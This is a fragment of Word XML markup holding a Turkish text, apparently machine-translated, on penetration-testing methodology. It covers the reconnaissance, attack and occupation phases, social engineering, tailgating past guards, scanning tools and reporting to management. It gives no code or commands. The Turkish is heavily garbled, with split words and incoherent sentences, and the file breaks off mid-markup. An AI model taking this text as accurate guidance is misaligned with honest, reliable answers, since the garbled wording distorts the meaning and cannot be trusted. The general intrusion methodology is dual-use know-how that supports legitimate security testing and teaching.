          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bilgisayar kulüp toplantıları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>listeleri, örgüt yapıları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>başvurusu bildiriler ve tur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iyecek ve içeceklerin teslim Satıcıları</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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abileceği istismar edecektir. Ayrıca henüz halka açık forumlarda içine yapılmış değil yeni saldırılar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üvenmek zorundadır tester önceki testlerde elde edilen ve bilgi güvenliği alanında çalışan güncel olayların bilgisi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>muhtemel caddeleri takip etm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mel yöntem, yaşanabilecek çeşitli önlemler ve bu önlemler için kullanılabilir yanıtları kullanımı (en azından</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>belirle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dım, hedef çevre üzerindeki fiili saldırıdır. saldırı sitesine veya sisteme girmeye ve yerinde olabilecek bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kısıtlamalarını aşmak için keşif aşamasında bulunan zayıflığını istismar oluşacaktır. tester keşif aşamasında</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yaptıysa, saldırı aşaması çok daha kolay hale ge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şamasında Zamanlama kritik önem taşıyabilir. Orada tester bir saldırı çalıştırmak için zaman lüksüne sahip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ve bu, arama testi ve açığa çıktıkça çevreye uyum sağlamak için büyük fl esneklik sağlayan edile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urumda, zaman bolluğu kullanılamaz. tester sahibinin öğlen saatinde fi les gelen bilgi toplamay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kçi mermi arasında bir bina girmeye çalışan veya bilinen bir alarm takıldı ve sistemin izinsiz tepkisi ara</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>saldırıyı tamamlamayı deneyen bu durumda olabilir (a penetrasyon tanınması ve yanıt ya da önlem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>arasındaki süre) ulaş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ldırı sırasında, yeni bir bilgisayar veya ağa test kazançları girişi, test saldırının işgal aşamasına geçmemiz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Meslek test harekât üssü olarak hedeflemislerdir belirtmek için kullanılan terimdir. tester bilgi toplama veya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>durumunu izleme veya tester diğer hedeflere karşı saldırı için bir üs olarak hedef kullanmak isteyebilir hedefte dah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çirmek istiyor, çünkü bu olabilir. tester o hedef ortamında mukim olduğu zaman süresince tespiti maruz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>işgal aşaması, belki test için en büyük tehlike sunuyor. tester işgal safhasına girmek seçerse, adımlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kadar tester varlığı belirlenemeyen yapmak alınmalı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testin tamamlanmasından önce keşif / saldırısı / işgal döngüyü defalarca tekrarlamak dikkat etmek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yeni saldırı hazırlanarak piyasaya gibi, test saldırı sonuçlarına tepki ve test pl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">anının bir sonraki adıma geçmek </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>saldırıyı terk edip saldırının başka bir türü için keşif başlamak için karar vermel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">idir. Bu döngünün tekrarlanması </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uygulama sayesinde, test sonunda testi tamamlayac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elektronik - - iki temel test türlerinin her biri farklı araçları ve metodolojileri vardır. güçlü ve her tür </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">zayıflıkların </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>penetrasyon testi yürütülürken muazzam yardımcı olacaktır. Örneğin, fiziksel g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">irmeler genellikle teknik bilgi </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bilgi gerekmez. bazı uzman teknik deneyim (örneğin, alarm sistemleri atlayarak)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gerektirebilir zaman, fiziksel </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>operasyonlar güvenlik, bina ve site operasyonlar, insan doğası ve sosyal etkileşim alanında beceri gerekti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sırasında kullanılan “araçlar” her test cihazı ile değişir ama genel olarak iki genel alana ayr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sistemlerinin kötüye kullanma ve sosyal etkileşim kötüye. koruma sistemlerinin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">kötüye örnekleri bilgi istemini </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">toplayıp masalarında açıkça sol bilgiyi kopyalama, yanlışlıkla kilitli bir fi le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">odası erişen, (erişim kontrollü </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aşağıdaki birisini) bindirme, geçmiş dikkatsiz güvenlik görevlisi yürüyen içerir. Koruma sistemleri tipik ve norma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edefi korumak için kurulur. Hedefin operasyonel prosedürlerin Bilgi normal ve a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">normal tehditler hem karşısında </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etmek mümkün test senaryolarını geliştirmeye test sağlayac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üvenlik bilincinin eksikliği herhangi bir başarılı bir fiziksel penetrasyon testinde büyük rol oynay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nin değerinin farkında değilseniz, düzgün onu korumak için daha az olas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ıdır. hassas bilgileri saklamak </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>politika ve prosedürlerin farkındalık eksikliği birçok şirket bol miktarda bulunur. pen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">etrasyon test aksi </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olmalıdır bilgilere erişmek için bu yararlan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osyal mühendislik belki etkili penetrasyon testleri için mükemmel bir araçtır</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. Toplum mühendisliği, fizik ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kontrollerinde açıklarını istismar “içeriden” yardım elemanı ekler v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lar, diğer taraftan, genellikle fiziksel girmeler benden daha derinlemesine teknik bilgi gerekti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yaşam saldırganlar durumunda, bu bilgi kendi olabileceği gibi başka birinden “ödünç”. Son yıllarda, birçok ye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knik özellikler internette penetrasyon ve saldırı araçlarının yüksek kullanılabilirlik, bu araçların gelişmişliği il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zalmış görünmektedir. Böylece, aracın geliştiricisinin ve fl içinde bilginin bir hedefe büyük zarar ict “ödünç”</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üyük bir olmadan kimse için nispeten basit hale geldi. Orada hala beceriyle teknik olarak gelişmiş</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ok sayıda bir sisteme karşı başarılı bir saldırı başlatmak için, ancak, var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ldırıda kullanılan aletler genellikle otomatik analiz veya saldırı özellikleri sağlamak olanlardır. Örneğin, birçok serbestç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ve ağ güvenliği analiz araçları bir sistemin açıklarını keşfetmek için otomatik bir yöntem ile test cihazı sağlamak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 fi elle nd mümkün olabilir açıklarını, ama otomatik araçların kullanımı çok daha büyük ef fi verimliliğini sağlar. Ayn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arayıcıları gibi araçlar (yani bir hedef ana bilgisayarda kullanımda olan hangi portların test anlatmak), ağ “koklayıcıları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çin bir ağ üzerinde o rekor tra fi c) ve “savaş dialer” (yani sistematik için telefon numaralarını aramak ) erişile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eşfetmek tester bu zayıflıkları yararlanmaya almalı hedef sistemdeki zayıflıklar ve olası caddeleri ile ilgili bilgi zenginliği ile tes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i, sistem konfigürasyonundalardır ve sistem diğer sistemlere sahiptir ilişki: elektronik testleri yürütürke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mel alanları vardır. İşletim sistemine karşı saldırılar henüz yönetici veya platformun üreticisi tarafından yamal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latformda böcek veya delikler istismar. Sistem konfigürasyonundalardır karşı saldırılar değil son sistem bülten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 kayıtlarını kontrol kullanılmayan hesapları veya sistem elemanlarının uygunsuz konfigürasyonundalar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aldırarak gibi rutin görevleri göz ardı etmek aşırı çalışan yöneticilerin doğal bir eğilim kullanmaya çalışabilir. Son olar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ngi saygı diğer sistemlerle bir sistem vardır ilişkisini kullanması olabilir. Bir hedef sistemine sahip bir güve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er başka makineden hedef makinede yönetici hakları tesis edebilir? Birçok durumda, başarılı bir penetrasyo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edef makinesini saldırmasını değil sonuçlanacaktır, ancak desteklendiği ilk başarıyla hedef makineye “ilişki” çeşi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ldıran.</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Sonuç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tinde fi nal adım yönetimine testin bulgular rapor etmektir. Raporun genel amacı ve sesi aslında bir tes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onucun kendi beklenti yönetimin ifadesiyle nişan başında ayarlanmalıdır. Gerçekte, ne test belirleyecektir iç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raporu bakmak istenir. tester bir şirketin genel fiziksel güvenliğini incelemek istenir, raporda fl vb şirket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dığı çeşitli güvenlik önlemlerinin genel bir bakış açısı yeniden olacaktır. tester belirli bir bilgisayar siste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ontrolleri değerlendirmek istenir, raporda büyük olasılıkla o makineden ayrıntılı analizini içerecekt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sonucunda üretilen rapor konusu vardır açıkları ve bu güvenlik açıklarından yararlanmak iç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esin saldırılarla ilgili son derece hassas bilgiler içermektedir. penetrasyon test raporu sadece bir ihtiyaç</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edefin yönetimi içinde olanlara dağıtılır sağlamak için büyük özen gerekir. Raporda şirketin yüksek hassasiye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şaretlenmiş olmalıdır. özellikle hassas veya gizlilik dereceli bilgilerinin söz konusu olduğunda, belirli bir fonksiyone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dece bilgi içeren her sürümü ile raporun çeşitli sürümleri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elgelenmiş halindeki test angajman rövanşı ile yönetimini sağlamalıdır. Test sırasında yaşananları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 hedefin açıkları bir listesini yönetim sağlar ve gelecekteki saldırılara karşı korumak için kullanıl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ğerlendirmek için onları t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testin ilk hedefleri belgelenmelidir. Bu test egzersizin amacı ve niyeti aşina hale orijinal karar verme sürecin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ğildi kimse yardımcı olacaktır. Daha sonra, test sırasında kullanılan metodoloji tarif edilmelidir. Bu, kullanıl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kkında bilgi, bu saldırıların başarılı veya başarısız ve test test sırasında</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> yaşanan dif fi zorluklardan ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>içerecektir. aşırı açıklayıcı ve (bazı durumlarda) tehlikeli olabilir kullanıla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">n hassas yöntemler hakkında çok </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detay sunarken, test ekibi tarafından kullanılan genel yöntemler ve prosedürl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">er rapora dahil edilmelidir. Bu </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sisteme girmek için test takımı için ne kadar kolay veya dif fi kült bir fikir edinmek için önemli bir araç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RC Press LLC tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>metodoloji ve prosedürler bir saldırı ev bilgisayarındaki İnternet bağlantısı fiyatına inte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rnetten başlatılabilir olduğunu </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ancak, şirket hedefini güvence içine daha fazla kaynak koymak isteyebilirsini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Raporda ayrıca test sırasında bulunan bilgileri listelenmelidir. Bu o nasıl bulun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">duğunu, bulunan ve dif fi büyük </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onu nding fi vardı nerede, bulunmuştur hakkında bilgi içermelidir. Bu bilgiler yöneti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mini testi ile ortaya çıkarılan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sorunlarının derinlik ve genişlik hissi vermek önemlidir. Bulunan öğelerin listesi yal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nızca bir veya iki ürün uzunsa, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sürece elbette test sadece bu bir veya iki öğe arıyordu) fonksiyonlarını ye</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rine getiremezler. Liste birkaç </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uzunluğunda Ancak, şirketin güvenlik politikaları ve prosedürleri de dramatik iyileştirmeler yapmak içine yönetim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nalizi için bazı bilinen miktarla karşılaştırıldığında hedefin güvenlik genel bir özetini vermelidir. Örneğ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sayarlarda şifreleri yüzde 10 kolay tahmin edildiğini bulmalarına olabilir. Ancak, önceki araştırmalar veya test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ternet veya diğer istemciler üzerinde ortalama bilgisayar yüzde 30 kolay tahmin şifreler içerdiğ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öylece, şirket aslında sektörü norm daha iyi yapıyor. Raporda şirketin binal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">arda korumaları yüzde 25'i test </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
